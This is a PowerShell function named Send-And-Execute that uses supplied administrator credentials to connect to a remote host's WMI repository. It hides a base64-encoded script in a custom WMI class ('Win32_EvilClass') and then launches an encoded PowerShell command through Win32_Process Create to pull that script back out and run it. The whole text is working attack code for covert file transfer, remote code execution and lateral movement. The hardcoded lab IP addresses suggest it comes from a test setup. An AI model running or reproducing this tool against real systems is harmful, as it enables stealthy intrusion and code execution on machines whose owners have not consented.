function Send-And-Execute { param( [string]$Username, [

1. function Send-And-Execute {
2.  
3. param(
4. [string]$Username,
5. [string]$Password,
6. [string]$IP,
7. [string]$LocalPath
8.  
9. )
10.  
11. # Run from 10.1.0.2 to transfer a file to 10.1.0.1.
12. #$localpath = 'C:\Users\Administrator\Desktop\test.ps1'
13. #$bytes = [IO.File]::ReadAllBytes($localpath)
14. $bytes = Get-Content $LocalPath -Raw
15. $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($bytes))
16.  
17. $opts = New-Object Management.ConnectionOptions
18. $opts.Username = $Username
19. $opts.Password = $Password
20. $opts.EnablePrivileges = $true
21.  
22. $conn = New-Object Management.ManagementScope
23. $conn.Path = "\\$IP\root\default"
24. $conn.Options = $opts
25. $conn.Connect()
26.  
27. $evilclass = New-Object Management.ManagementClass($conn, [String]::Empty, $null)
28. $evilclass['__CLASS'] = 'Win32_EvilClass'
29. $evilclass.Properties.Add('EvilProperty', [Management.CimType]::String, $False)
30. $evilClass.Properties['EvilProperty'].Value = $encoded
31. $evilclass.Put()
32.  
33. $secure_pass = ConvertTo-SecureString $Password -AsPlainText -Force
34. $creds = New-Object System.Management.Automation.PSCredential($Username, $secure_pass)
35. #$creds = Get-Credential '10.1.0.2\Administrator'
36.  
37. $args = @{
38. Credential = $creds
39. ComputerName = '10.1.0.2'
40. }
41.  
42. $payload = @'
43. $encodedFile = ([WmiClass]'root\default:Win32_EvilClass').Properties['EvilProperty'].Value
44. Invoke-Command -ScriptBlock {powershell -NoProfile -EncodedCommand $encodedFile}
45. '@
46.  
47. $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
48. $power = "powershell -NoProfile -EncodedCommand $encodedPayload"
49.  
50. Invoke-WmiMethod @args -Class Win32_Process -Name Create -ArgumentList $power
51. }